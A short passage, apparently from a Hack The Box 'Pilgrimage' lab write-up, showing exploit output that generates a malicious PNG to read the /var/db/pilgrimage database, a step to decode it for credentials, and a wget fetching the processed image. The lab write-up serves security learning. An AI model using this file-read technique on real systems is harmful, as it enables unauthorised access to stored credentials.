Rogue-1/HTB/Machines/Linux/Pilgrimage.md

    [>] Placing Payload to read /var/db/pilgrimage
    [>] PoC PNG generated > exploit2.png
 ```

+Follow the same steps to create the new exploit with /var/db/pilgrimage and then decode to find some credentials.
 ```
 └──╼ [★]$ sudo wget http://pilgrimage.htb/shrunk/64a324799638f.png
 --2023-07-03 20:41:58--  http://pilgrimage.htb/shrunk/64a324799638f.png